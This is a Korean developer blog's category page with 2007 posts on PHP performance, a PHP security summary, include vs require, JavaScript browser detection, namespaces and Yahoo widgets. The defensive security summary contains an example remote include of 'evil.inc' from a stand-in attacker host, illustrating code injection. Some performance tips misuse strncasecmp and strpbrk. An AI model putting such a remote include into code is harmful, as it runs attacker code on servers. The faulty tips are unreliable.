'ITWeb/개발일반'에 해당되는 글 489건

  1. 2007.08.22 [PHP]tutorials.
  2. 2007.08.22 PHP Performance
  3. 2007.08.22 PHP 보안 (Essential PHP Security)
  4. 2007.08.22 PHP include vs require
  5. 2007.04.18 [강좌]browser detecting
  6. 2007.04.06 [강좌] debug 창
  7. 2007.04.03 [강좌] namespace 1
  8. 2007.02.23 [위젯]설치하기
  9. 2007.02.22 [위젯]시작하기에 앞서

[PHP]tutorials.

ITWeb/개발일반 2007. 8. 22. 15:18
http://www.phpro.org/tutorials/?route=tutorials

정리가 깔끔하게 되어 있는 사이트 입니다.
이미 다 아는 사이트면 패스 ~~

http://www.php.net <-- 여긴 php 개발자면 기본이죠 ^^*
:

PHP Performance

ITWeb/개발일반 2007. 8. 22. 14:46

Reference Blog

PHP Performance

  • 디렉토리나 파일은 가능한 짧게 유지 하라.
  • FollowSymLinks 옵션을 사용하라.
  • logging 은 한파일에 하고 분석시 logging 을 중지 하라.
  • KeepAliveTimeout 은 가능한 낮게 잡아라.
  • static / dynamic request 를 구분하라.
  • output buffering 은 브라우저의 rendering 을 빠르게 해준다.
    • ob_start()
    • output_buffering=on
    • SendBufferSize = PageSize ( in apache )
    • memory size 가 작은 시스템에서는 사용하지 말라.
for($i = 0; $i < 1000; $i++) { echo $i; }

This method is much slower than something like this:

ob_start(); for($i = 0; $i <1000; $i++) { echo $i; } ob_end_flush();

    • 1.36509799957 without ob_start()
    • .248747825623 with ob_start()
  • bandwidth optimization
    • server 자원을 줄인다.
    • client page load 를 빠르게 한다.
    • network io 를 줄인다.
  • compression 은 cpu 의 3-5% 의 load 를 줄인다.
    • apache 1 : mod_gzip
    • apache 2 : mod_deflate
  • Tuning PHP Configuration
    • register_globals = Off **
    • magic_quotes_gpc = Off
    • expose_php = Off
    • register_argc_argv = Off
    • always_populate_raw_post_data = Off **
    • session.use_trans_sid = Off **
    • session.auto_start = Off **
    • session.gc_divisor = 1000 or 10000
    • output_buffering = 4096
  • Tuning PHP File Access
    • Inefficient Approach : < ? php include "file.php"; ? >
    • Performance Friendly Approach : < ? php include "/path/to/file.php"; or include "./file.php"; ? >
  • Regular Expression
    • Slow
      • if (preg_match("!^foo_!i", "FoO_")) { }
      • if (preg_match("![a8f9]!", "sometext")) { }
    • Faster
      • if (strncasecmp("foo_", "FoO_", 4)) { }
      • if (strpbrk("a8f9", "sometext")) { }
  • Optimizing str_replace()
    • replacement 할 필요가 없는 것들을 제거 하고 사용할것
      • 바꿔야 할 문자열과 대치해야할 문자열 중 필요 없는건 제거 할것
  • strtr() vs str_replace()
    • str_replace 가 strtr 보다 10배 정도 빠르다.
  • fopen() vs file_get_contents()
    • file_get_contents() 가 훨씬 간단하고 빠르다.
  • 쓰면 유용한 함수들
    • file_put_contents()
      • Append data to files or create new files in one shot.
    • microtime() and gettimeofday()
      • Return floats when passed TRUE as a 1st argument.
    • mkdir()
      • Can create directory trees, when 2nd arg. is TRUE.
    • glob()
      • Fetch all array of files/directories in one shot.
    • convert_uuencode,convert_uudecode
      • Fast UU encoding/decoding mechanism.
    • http_build_query()
      • Build GET/POST query based on associated array.
    • substr_compare()
      • strcmp/strncasecmp/etc… from an offset.
    • array_walk_recursive()
      • Recursively iterate through an array.
    • convert_uuencode,convert_uudecode
      • Fast UU encoding/decoding mechanism.
    • http_build_query()
      • Build GET/POST query based on associated array.
    • substr_compare()
      • strcmp/strncasecmp/etc… from an offset.
    • array_walk_recursive()
      • Recursively iterate through an array.
  • Multi-dimensioal Array trick
    • slow 2 extra hash lookups per access
      • $a['b']['c'] = array();
      • for($i = 0; $i < 5; $i++) $a['b']['c'][$i] = $i;
    • much faster reference based approach
      • $ref =& $a['b']['c'];
      • for($i = 0; $i < 5; $i++) $ref[$i] = $i;
  • Static 선언은 50-75% 의 성능 향상을 준다.
  • 불필요한 wrapper 를 제거 한다.
  • The simpler the code, the faster it runs, it really is that simple.
  • string concatenation
    • echo ''; 보다 echo ''; 가 일반적이다.

  • include nested-looping 사용에 대한 주의
main
require_once
  php_self
require_once (2x)
  session_is_registered
  require_once
require_once
  require_once (3x)
    require_once (2x)
  require_once
    require_once
      require_once
        require_once
          is_array
          use_plugin
            file_exists
            include_once
            function_exists
            ... etc
As you can see, a require_once was performed and inside that a php_self was executed. Then another require_once executed session_is_registered, followed by another require_once and so on. Basically, the function call tree is like a little window into the Zend Engine, allowing you to watch the sequence of events that take place when your Web application is run.

If you do much object-oriented development, you may find that you rapidly lose track of what's actually going on inside some classes and methods. It's tempting to think of classes as a black box, because that's how we're taught to use them. But, when optimizing a complex Web application, you need to know what's actually going on inside each one, or you may have performance bottlenecks you do not even notice.

  • Avoid repeated function calls
    • for ( $i=0; $i<count($aArray); $i++ ) {} : bad
    • $nCnt = count($aArray); for ( $i=0; $i<$nCnt; $i++ ) {} : good
  • string concatenation
    • sprintf 보다 plain string concatenation 이 두배 정도 빠르다.
  • print() 대신 echo 를 사용 하라.
  • string 표현은 signle quotes 를 사용 하라.
  • Reduces Number Of System Calls (Optimizes PHP<->OS Communication)


:

PHP 보안 (Essential PHP Security)

ITWeb/개발일반 2007. 8. 22. 14:44

1. 소개

  • 단순한 것이 아름답다
    • 코딩을 할 때 복잡하게 하게 되면 실수를 하게 되고 이런 부분에서 보안 취약점이 드러난다.
    • ?:; 이것 보다 if 문을 사용하는것이 이런 실수를 더 줄일 수 있다.
  • 명명 규칙
    • 엄격한 명명규칙을 사용하면 코드 전반에서 사용되는 모든 데이터의 출처를 구별하는데 유용하다.
    • 적극 권장
  • 입력 필터링
    • 입력을 구분하는 단계
    • 입력을 필터링 하는 단계
    • 필터링된 데이터와 오염된 데이터를 구별하는 단계
    • 데이터베이스 서버나 RSS 피드 같은 것들도 입력이 될 수 있다.
    • 일반적으로 세션 데이터 저장소나 데이터베이스의 데이터를 입력으로 간주하는 것이 보다 안전하며, 중요한 PHP 응용프로그램에 대해서는 이런 관점을 추천한다.
    • 필터링에 대해서는 사용자가 필터링 규칙을 따라 오도록 해야 한다.
    • 유효하지 않은 데이터를 수정하려는 행위가 오류를 포함할 가능성이 높고, 잘못된 데이터를 통과시킬 수 있다.
      • 검사는 수정보다 훨씬 안전한 대안이 될 수 있다.
    • 필터링 된 데이터는 다른 변수에 재할당 한다.
      • $aFiltered = array();
      • $sEmail = $_POST['email'];
      • $sEmail = getVerifiedEmail($sEmail); // filtering
      • $aFiltered['email'] = $sEmail;
  • 출력 이스케이프
    • 출력을 구분하는 단계
    • 출력을 이스케이프하는 단계
      • 심층 방버에 충실하기 위한 지침이다.
      • htmlentities()
      • mysql_real_escape_string() (addslashes())
    • 이스케이프된 데이터와 그렇지 않은 데이터를 구분하는 단계

2. 폼과 URL

  • 크로스 사이트 스크립팅(XSS, cross-site scripting) 및 크로스 사이트 리퀘스트 위조(CSRF, cross-site request forgeries) 에 대해 살펴 보고 폼과 HTTP 요청을 직접 조작하는 스푸프(spoof)에 대해서 살펴 볼 것이다.
  • 폼과 데이터
    • 필터링된 데이터
    • 오염된 데이터
    • 데이터를 바꿀수 없게 하려면 변수 대신 상수를 사용해야 한다.
      • 재정의하려는 시도는 경고를 보여 주지만 값이 변경되지 않는다.
    • GET, POST, HTTP 모두 의심해야 한다.
  • URL 공격
    • GET 전송방식이 보다 많은 데이터를 노출하기 때문에 보다 자주 공격 대상이 된다.
  • 파일 업로드 공격
    • 클라이언트측과 서버측에서도 제한을 따르도록 해야 한다.
    • upload_max_filesize 와 post_max_size 로 제한을 줄 수 있다.
    • is_uploaded_file() 과 move_uploaded_file() 함수를 이용해서 파일을 검사한다.
  • 크로스 사이트 스크립팅
    • XSS (Cross-Site Scription)
    • 클라이언트에 데이터를 보낼때는 이스케이프하기 위해 htmlentities() 를 사용해야 한다.
    • http://ha.ckers.org/xss.html
  • 크로스 사이트 리퀘스트 위조
    • CSRF (Cross-Site Request Forgery)
    • $_REQUEST 를 사용하는것을 권장하지 않는다.
    • html 폼에서 GET 대신에 POST를 사용하고 폼 처리 로직에서는 $_REQUEST 대신 $_POST를 사용한다.
    • 중요한 처리에 대해서는 사용자가 요청한 것이 맞는지 확인을 요청한다.
    • NOTE : 처리를 수행하는 모든 폼은 POST 요청방식을 사용해야 하며 RFC 2616의 9.11 절을 보면 이를 다음과 같이 기술하고 있다. "특히, GET과 HEAD 요청방식은 정보 질의 이외의 처리에 대해서는 사용하지 않아야 한다는 관례가 정착되어 있다. GET 과 HEAD 요청방식은 '안전한' 것으로 간주 되어야 한다. GET 과 HEAD 요청방식을 안정한 것으로 간주하면 사용자 에이전트는 POST, PUT, DELETE와 같은 요청방식들을 특별한 방식으로 구분할 수 있으면 사용자는 안전하지 않은 동작이 요청 되고 있다는 사질을 인지할 수 있게 된다"
    • 폼 제출시 한 사용자에게만 유효한 토큰을 생성 하여 유효성을 검사한다.
      • 토큰의 유효 기간도 설정을 하여 공격에 대비를 할 수 있다.
      • 공격자는 한 명의 사용자에게 제한할 수 있다.
    • 그렇다고 POST 방식만 사용하려 해서는 안 된다.
  • 폼 제출 스푸핑
    • 가짜 폼을 조작해서 요청을 한다.
    • 레퍼러를 사용해서 폼이 있는 URL 이 유효 한지 검사를 할 수 있으나 자제 하기 바란다.
  • HTTP 요청 스푸핑
    • 공격자는 HTTP 요청을 조작하여 완전하게 제어할 수 있다.
    • telnet 을 이용해서 공격 가능함.

3. 데이터베이스와 SQL

  • 데이터베이스에서 가져오는 모든 데이터를 반드시 필터링해야 하며 이스케이프해야 한다.
  • 흔히 저지르는 실수는 SELECT 쿼리도 데이터베이스로 보내는 데이터라는 것을 잊어 버리는 것이다.
  • 쿼리 자체도 웹 응용프로그램에서 데이터베이스로 보내는 출력이라는 것을 잊지 말아야 한다.
  • 액세스 인증 정보 유출
    • 웹서버 루트 안쪽에 인클루드 파일들을 저장하는 것은 위험을 자초한 셈이다.
    • 웹서버(아파치)에서 .inc 파일에 대한 요청을 거부 하도록 설정할 수 있다.
      • < Files ~ "\.inc$" >
      • Order allow, deny
      • Deny from all
      • < /Files >
  • SQL 삽입 공격
    • 취약점은 입력하는 데이터를 필터링하지 못하는 것과 데이터베이스에 보내는 데이터를 이스케이프하지 못하는 것 이다.
    • 2004년 8월에 MD5에서 일부 해시가 충돌 한는 문제가 언급되었다.
    • MD5 암호화 알고리즘은 이미 완전히 깨졌다.
    • MYSQL 사용자라면 mysql_real_escape_string() 함수만 사용하면 된다.
      • 만약 제공하지 않는다면 addSlashes() 를 사용할 수 있다.
    • 바운드 매개변수를 사용하면 SQL 삽입 공격에 대해 가장 강력한 보호 수단을 갖춘 것이다.

4. 세션과 쿠키

  • 쿠키 홈치기
    • 쿠키 사용과 관련된 위험은 공격자가 사용자 쿠키를 훔칠 수 있다는 점이다.
    • 예를 들어, 세션ID를 쿠키에 저장한다면 쿠키 노출에 의해 세션 하이재킹까지 가능하기 때문에 심각한 위험이 될수 있다.
  • 세션 데이터 노출
    • session_set_save_handler() 를 사용해서 자신만의 세션 저장소를 작성하고, 세션 데이터를 저장할 때 암호화하고 가져올 때 해독하는 함수를 작성하는 것으로 쉽게 구현할 수 있다.
  • 세션 고정
    • 공격자는 유효한 세션ID를 얻기 위해 주로 세 가지 방법을 사용한다.
      • 예측, 캡쳐, 고정
    • SSL 을 사용하고, 브라우저를 최신의 버전으로 유지하는 것으로 낮출 수 있다.
  • 세션 하이재킹
    • 요청들 속에서 일관성을 인식하고 일관되지 않은 행위에 대해서 의심스러운 것으로 다룬다. 하지만 proxy 를 통해서 위조 될수 도 있다.
    • 보다 좋은 방법은 신분 확인의 두번째 형태로도 볼 수 있는 것으로 URL에 토큰을 전달하는 것이다.

5. 인클루드

  • 모든 개발자들은 모듈 형태의 디자인의 가치를 이해하고 있어야 한다.
  • 소스 코드 유출
    • 인클루드 확장자를 .inc 로 사용하는 경우
    • 웹 서버 루트에 인클루드를 저장한 경우
    • 아파치에서 .inc 파일에 대한 리소스 타입을 지정하지 않은 경우
    • 아파치의 DefaultType? 설정이 text/plain 인 경우
    • URL 을 통해서 인클루드에 접근 할 수 있고 사용자 브라우저에 소스 코드가 표시될 수 있다.
    • 모든 인클루드를 웹 서버 루트 바깥에 저장하는 것이 최선의 방법이다.
    • 인클루드의 확장자를 .php 로 하는것, .inc 리소스에 대한 요청을 거부 하도록 아파치를 설정하는 방법 등이 있다.
  • 백도어 URL
    • URL을 통한 직접 액세스를 의도하지 않았는데 URL을 통해서 직접 리소스에 액세스할 수 있는 것을 말한다.
  • 파일 이름 조작
    • 동적 인클루드를 사용해서 페이지의 동적인 부분을 캐시하는 것은 장점이 있지만 한편으로 공격자에게 어떤 캐시된 파일을 표시할지 선택할 수 있는 완벽한 기회를 제공하는 것이기도 하다.
    • 동적 인클루드를 사용할 때 결코 오염된 데이터를 사용해서는 안 된다는 것이다.
  • 코드 삽입 공격
    • allow_url_fopen 지시문의 사용은 돌려 주는 소스가 PHP 코드라고 상상해 보면, PHP 코드는 해석되고 실행될 수 있다.
    • include 'http://evel.sample.org/evil.inc'

6. 파일과 명령

  • 파일 시스템 트래버스
    • 오염된 데이터를 파일 이름의 일부로 사용할 때 취약점이 발생한다.
    • basename() 함수는 문자열에 원하지 않는 경로 정보가 포함되었는지 조사하는데 유용한 함수다.
  • 원격 파일 위험
    • PHP 에서 allow_url_fopen 설정이 있으며 기본 값으로 설정되어 있다. 이 옵션이 설정되어 있으면 PHP에서는 다양한 리소스를 마치 로컬 파일처럼 참조할 수 있다. 이런 경우 공격자가 임의의 코드를 실행하는 것이 가능하기 때문에 PHP 응용프로그램이 가질 수 있는 가장 심각한 취약점으로 간주 된다.
    • 항상 입력을 필터링 하고 파일 이름을 지정할 때는 필터링된 데이터만 사용해야 한다.
  • 명령 삽입 공격
    • 가능 하면 쉘 명령의 사용을 피할 것을 권한다. 쉘 명령을 사용해야 한다면 실행할 문자열을 구성하기 위해서 필터링된 데이터만 사용해야 하며 항상 실행 결과를 이스케이프해야 한다.

7. 인증과 권한 부여

  • 무차별 공격
    • 모든 가능성을 검토하는 공격을 말한다.
    • 인증 시도를 제한 하거나 실패 횟수를 제한하는 것은 일반적으로 상당히 효과적인 보호 수단이지만 정상적인 사용자에게 불이익을 주지 않고는 공격자를 식별하고, 막을 수 없다는 딜레마가 존재한다.
    • 무차별 공격이 통하지 않게 하기 위해 간단한 시간 지연을 사용할 수 있다.
    • 로그인을 실패한 사용자가 15츠 이내에 시도하려고 하면 로그인 정보가 맞더라도 인증이 실패되는 것으로 출력한다.
    • 인증 실패의 결과 화면은 항상 같아야 한다.
  • 패스워드 스니핑
    • POST 방식의 SSL 사용을 권장한다.
  • 리플레이 공격
    • 정상적인 사용자가 액세스권한이나 특별한 권한을 얻기 위해 전송한 데이터를 공격자가 재전송하는 종류의 모든 공격을 뜻한다.
  • 로그인 정보 기억
    • 쿠키에 저장되는 정보는 인증에 사용될 수 있는 시간대가 제한되어야 한다.
    • 쿠키는 1주일 또는 그 이하의 기간 안에 만료 되어야 한다.
    • 쿠키는 오직 한 번의 인증에 대해서만 유효해야 한다.
    • 일주일 또는 그 이하의 기간 안의 만료는 서버에서 강제 수행되어야 한다.

8. 공유 호스팅

  • 소스 코드 유출
    • 웹 서버 루트 바깥에 저장된 db.inc 파일이 있다고 하자.
    • 이 문제에 대한 가장 좋은 해결책은 root만 읽을 수 있는 파일에 서버 환경 변수로 설정하여 액세스 하는 것이다.
    • chmod 600 db.conf
    • phpinfo() 같은 함수의 실행 결과를 공개적으로 액세스할 수 없게 해야 한다.
  • 세션 데이터 유출
    • 가장 좋은 해결책은 사용자 이름과 비밀번호로 보호되는 데이터베이스에 세션 데이트를 저장하는 것이다.
  • 세션 삽입 공격
    • 이 공격 유형은 웹 서버가 세션 데이터 저장소에 대해 읽기 권한 뿐만 아니라 쓰기 권한도 있다는 사실을 이용한 것이다.
    • 가장 좋은 해결책은 데이터베이스에 세션 데이터를 저장하는 것이다.
  • 파일 시스템 브라우징
  • 안전 모드
    • PHP 의 안전모드는 장벽을 높이는 역할을 하기 때문에 심층 방버 전략으로는 고려해볼 만하다.



:

PHP include vs require

ITWeb/개발일반 2007. 8. 22. 14:44

include

  • include_path 를 먼저 찾는다
  • a.php 내부에 b.php 가 include 되어 있으면 b.php 를 먼저 찾는다.
  • include 실패시 warning 을 내고 script 는 진행이 되지만 require 는 fatal error 를 내고 정지 한다.
  • include 는 변수 scope 을 그대로 유지 한다.
  • function, class, defined 는 global scope 을 갖는다.
include() The include() statement includes and evaluates the specified file.

The documentation below also applies to require(). The two constructs are identical in every way except how they handle failure. They both produce a Warning, but require() results in a Fatal Error. In other words, use require() if you want a missing file to halt processing of the page. include() does not behave this way, the script will continue regardless. Be sure to have an appropriate include_path setting as well. Be warned that parse error in included file doesn't cause processing halting in PHP versions prior to PHP 4.3.5. Since this version, it does.

Files for including are first looked for in each include_path entry relative to the current working directory, and then in the directory of current script. E.g. if your include_path is libraries, current working directory is /www/, you included include/a.php and there is include "b.php" in that file, b.php is first looked in /www/libraries/ and then in /www/include/. If filename begins with ./ or ../, it is looked only in the current working directory.

When a file is included, the code it contains inherits the variable scope of the line on which the include occurs. Any variables available at that line in the calling file will be available within the called file, from that point forward. However, all functions and classes defined in the included file have the global scope.

require

  • 실행중인 processing 을 중지 하고 싶을 때 사용한다.
  • 상속을 사용하지 않을 때 사용한다.
  • looping 구조에 어떠한 행동도 하지 않는다.
    • loop 안에서 한번만 발생된다.

require() and include() are identical in every way except how they handle failure. They both produce a Warning, but require() results in a Fatal Error. In other words, don't hesitate to use require() if you want a missing file to halt processing of the page. include() does not behave this way, the script will continue regardless. Be sure to have an appropriate include_path setting as well.

require() will always attempt to read the target file, even if the line it's on never executes. The conditional statement won't affect require(). However, if the line on which the require() occurs is not executed, neither will any of the code in the target file be executed. Similarly, looping structures do not affect the behaviour of require(). Although the code contained in the target file is still subject to the loop, the require() itself happens only once.

require_once

  • 이미 include 되어 있다면 다시 include 하지 않는다.
  • require 와 비슷하다.

include_once

  • 이미 include 되어 있다면 다시 include 하지 않는다.
  • include 와 비슷하다.


reference : http://au.php.net/manual/en/function.include.php

:

[강좌]browser detecting

ITWeb/개발일반 2007. 4. 18. 10:49

아마 cross browsing 을 지원하기 위해서 제일 처음 하는 부분이 browser detection 이 아닐까 생각 합니다.
browser 별로 지원하는 DOM elements 나 javascript 의 method, properties 들이 다르기 때문에 필요한 부분이 아닌가 싶습니다.
장기적으로는 개발자들 또는 사용자들을 위해서 각 vendor 들이 표준을 따라 제공해 줬으면 좋겠으나 흐.. 역시 힘든 부분 이겠죠...

- 시작하기에 앞서 우선 봅시다.
http://www.junetool.com/splv/browser.html

- 확인해야 하는 사항들
ref. http://www.comptechdoc.org/independent/web/cgi/javamanual/javanavigator.html
javascript 에 있는 navigator 객체를 확인해 보시면 쉽게 알수 있습니다.
예)
    for ( sVal in navigator ) {
        web.util.debug.log("property : " + sVal);
        web.util.debug.log("value : " + navigator[sVal]);
    }
- IE
appCodeName
    Mozilla
appName
    Microsoft Internet Explorer
cpuClass
    x86
platform
    Win32
appVersion
    4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3; IEMB3)
userAgent
    Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3; IEMB3)

- FF
platform
    Win32
appName
    Netscape
appCodeName
    Mozilla
appVersion
    5.0 (Windows; ko)
oscpu
    Windows NT 5.1
userAgent
    Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3

환경이 받혀주지 못해서..ㅡㅡ^
IE, FF 만 적어 봤습니다.

ref. http://www.quirksmode.org/js/detect.html : 요기에 보시면 좀더 다양하게 정리가 되어 있으니 참고 하셔도 좋을것 같습니다.

:

[강좌] debug 창

ITWeb/개발일반 2007. 4. 6. 15:26
간단한 prototype 만 있습니다.

http://www.junetool.com/splv/debug.html

1. 개요
alert 형태의 client debugging 이 불편해서 브라우저에 디버그 창을 띄워 놓고 메시지를 출력한다.

2. 특성
심플하다.

3. 라이센스
그런거 없고 막 가져다 쓰고 임의 수정해도 무관하다. ^^*

4. version
0.0.1

5. 첨부된 파일
*.js 는 javascript class 또는 package 이고, *.html 은 샘플 prototype

- debug.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>javascript::debug</title>
</head>
<script src="web.js"></script>
<script src="web.util.js"></script>
<script src="web.util.element.js"></script>
<script src="web.util.debug.js"> </script>
<body>
<input type=button value="DEBUG WINDOW ON/OFF" onclick="web.util.debug.init('oWebDebug')">
<br>
<input type=button value="DEBUG LOGGING" onclick="web.util.debug.log('test')">
<br>
<input type=button value="DEBUG CLEAN" onclick="web.util.debug.set_clean()">
<br>
<input type=button value="DEBUG TIME SWITCH" onclick="web.util.debug.set_time_switch()">
<br>
<input type=button value="DEBUG CLOSE SWITCH" onclick="web.util.debug.set_close()">
</body>
</html>
:

[강좌] namespace

ITWeb/개발일반 2007. 4. 3. 18:38

ajax 가 보편화 되면서 javascript 에 대한 oop 개발 방법이 많이 도입되고 있는데요.
그냥 공부도 할겸 client application 에 관심이 많은 지라 javascript 강좌를 개설 했습니다.

뭐 우선 내가 좋아라 하는 거나 만들고 있는 것 부터 시작을 할까 합니다.
그 첫번째가 namespace 인데요.

http://www.mozilla.org/js/language/js20/core/namespaces.html

If a namespace is defined as a member of a class, then the namespace must be declared static.
번역을 하자면.. (참고로 저는 영어 그닥 잘하지 못합니다.. ^^;)
클래스 맴버로 namespace 가 선언되어 있으면 선언된 namespace 는 반듯이 static 으로 선언 되어 진다.
라는 이야기 입니다.

예를 통해서 확인해 보죠..

http://www.junetool.com/splv/namespace.html

- web.js 코드
/*
   namespace 를 등록하는 이유는 javascript 의 OOP 개발 방법을 적용하기 위한 방법중 하나이다.
*/
// global class (package)
var web = web || {};

// name space function
web.namespace = function ( sNS ) {
    var aNS = sNS.split(".");
    var oTopClass = web;
    var i=0;

    for ( i=0; i<aNS.length; i++ ) {
        oTopClass[aNS[i]] = oTopClass[aNS[i]] || {};
    }
}

-- namespace.html 코드
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>javascript::namespace</title>
</head>
<script src="web.js"></script>
<script>
web.util = {
    temp:"web.util"
}

web.util.string = {
    temp:"web.util.string"
}
</script>

<body>

<script>
web.namespace("WEB.util.string");
alert(web.util.temp + "\n" + web.util.string.temp);
</script>
</body>
</html>

요기까지 허접 설명 이였구요.
좀 다듬어진걸로 해서 서버에 올리고 공유 하지요.

참 요즘 표준화에도 관심이 많습니다.
표준화에 대해서도 시간이 되는 데로 욜심히 올려 보도록 하겠습니다.

:

[위젯]설치하기

ITWeb/개발일반 2007. 2. 23. 14:25

자 위젯을 사용하기 위해서 필요한 프로그램을 설치해 봅시다.

1. 준비물
    설치프로그램 : http://us.dl1.yimg.com/download.yahoo.com/dl/widgets/kr/ywidgets_kr.exe
    한글 버전으로 준비 했습니다.
    영문 버전이 필요 하신 분은..
        http://widgets.yahoo.com/win, http://widgets.yahoo.com/mac
    그 이외 준비물은 시작하기에 앞서에서 준비 하세요.

2. 설치
    ywidgets_kr.exe 를 실행 시킨다.
    대략 이미지 캡쳐는 귀차니즘에 의해서 생략하고..
    대부분 check 한 상태로 "다음" 버튼을 눌러서 진행을 한다.
    설치가 잘된 분은 아래와 같은 화면을 만나실수 있습니다.

사용자 삽입 이미지

축하합니다!! 설치성공!!


























자 시작이 반이라고 ^^* 야후! 위젯의 반을 배우셨습니다.
한번 혼자서 이것 저것 눌러 보면서 정말 구경해보시구요.
구경하기 싫으신 분은 다음 강좌가 나오기 전까지 reference pdf 파일 읽어 보셔요 ^^*
(워낙에 회사일로 바쁜척하는지라 업데이트가 늦을수도 있다는거.. ^^;)

:

[위젯]시작하기에 앞서

ITWeb/개발일반 2007. 2. 22. 11:27

제가 작성하는 위젯 강좌는 윈도우즈용 입니다.

- 야후 위젯
us - http://widgets.yahoo.com/
kr - http://kr.widgets.yahoo.com/

- 도구들 : http://kr.widgets.yahoo.com/wdata/data01.html
한글 reference 가이드 : http://img.yahoo.co.kr/widget/2006/12/KR_WidgetEngineReference.pdf
영문 reference 가이드 : http://img.yahoo.co.kr/widget/2006/05/WidgetEngineReference_3.1.pdf
한글 튜토리얼 : http://img.yahoo.co.kr/widget/2006/12/KR_WidgetCreationTutorial.pdf
영문 튜토리얼 : http://img.yahoo.co.kr/widget/2006/05/Widget_Creation_Tutorial.pdf
한글 포토샵 CS 사용가이드 : http://img.yahoo.co.kr/widget/2006/12/KR%20-%20Widget_Creation_Script.zip영문 포토샵 CS 사용가이드 : http://img.yahoo.co.kr/widget/2006/05/Widget_Creation_Script.zip
윈도우즈 컨버터 : http://img.yahoo.co.kr/widget/2006/05/WindowsConverter_1.0.zip

한글 버전은 따로 첨부 파일로도 올렸습니다.

위젯은 html, xml, javascript 등에 대한 이해가 조금만 있으셔도 만드실수 있습니다.

시작하기에 앞서 위에 문서들을 한번씩 읽어 보시고 따라해 보신 분들은 강좌를 안보셔도 직접 위젯을 만드실수 있을 겁니다.

좀더 많은 자료를 원하시는 분들은 검색을 해보세요 ^^*
http://www.google.co.kr/search?q=widget
http://kr.search.yahoo.com/search/web?p=widget

: